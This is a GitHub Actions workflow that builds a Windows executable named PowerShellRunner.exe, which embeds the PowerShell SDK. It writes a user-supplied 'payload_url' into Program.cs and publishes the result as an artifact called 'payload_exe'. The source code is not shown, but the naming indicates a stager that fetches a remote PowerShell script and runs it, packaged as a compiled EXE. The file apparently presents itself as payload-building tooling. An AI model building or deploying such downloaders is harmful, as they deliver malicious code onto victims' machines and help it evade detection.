name: Build PowerShell EXE using .NET

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch PowerShell script'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Install .NET SDK
      run: dotnet --version

    - name: Inject Payload URL into Program.cs
      shell: powershell
      run: |
        $payloadUrl = '${{ github.event.inputs.payload_url }}'
        (Get-Content Program.cs) -replace '__PAYLOAD_URL__', $payloadUrl | Set-Content Program.cs

    - name: Create .NET console project
      run: |
        dotnet new console -o PowerShellRunner
        mv Program.cs PowerShellRunner/
        cd PowerShellRunner
        dotnet add package Microsoft.PowerShell.SDK

    - name: Build EXE
      run: |
        cd PowerShellRunner
        dotnet build -c Release

    - name: Upload executable
      uses: actions/upload-artifact@v4
      with:
        name: payload_exe
        path: PowerShellRunner/bin/Release/**/PowerShellRunner.exe


